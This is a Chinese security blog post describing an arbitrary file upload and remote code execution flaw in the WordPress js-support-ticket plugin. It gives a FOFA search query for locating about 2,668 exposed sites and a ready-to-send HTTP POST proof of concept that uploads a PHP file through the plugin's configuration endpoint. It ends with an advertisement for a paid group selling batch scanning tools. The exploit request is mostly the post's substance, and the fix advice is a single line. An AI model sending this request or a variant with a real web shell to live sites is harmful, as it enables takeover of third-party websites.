0x01 免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
0x02 简介
WordPress是一款免费开源的内容管理系统(CMS),最初是一个博客平台,但后来发展成为一个功能强大的网站建设工具,适用于各种类型的网站,包括个人博客、企业网站、电子商务网站等,并逐步演化成一款内容管理系统软件。
0x03 漏洞描述
WordPress js-support-ticket存在一个严重的安全漏洞,攻击者可以在安装了js-support-ticket的任何WordPress网站上任意上传文件并远程代码执行。
0x04 Fofa语法与漏洞编号
FOFA:
body="wp-content/plugins/js-support-ticket"
影响资产数量:2,668
CNVD漏洞编号:无
0x05 影响版本
WordPress js-support-ticket
0x06 漏洞复现
POC
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0
----------767099171
Content-Disposition: form-data; name="action"
configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"
jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png
<?php echo md5(123);unlink(__FILE__);?>
----------767099171--
成功访问上传的文件。
0x07 Nuclei批量验证脚本
Nuclei验证脚本已发布
知识星球:冷漠安全
0x08 修复建议
官方已发布安全修复版本,请升级至官网最新版本
漏洞详情及批量检测POC工具请前往知识星球获取
知识星球:冷漠安全
限时优惠券:加入立减25
星球福利:每天更新最新漏洞POC、资料文献、内部工具等。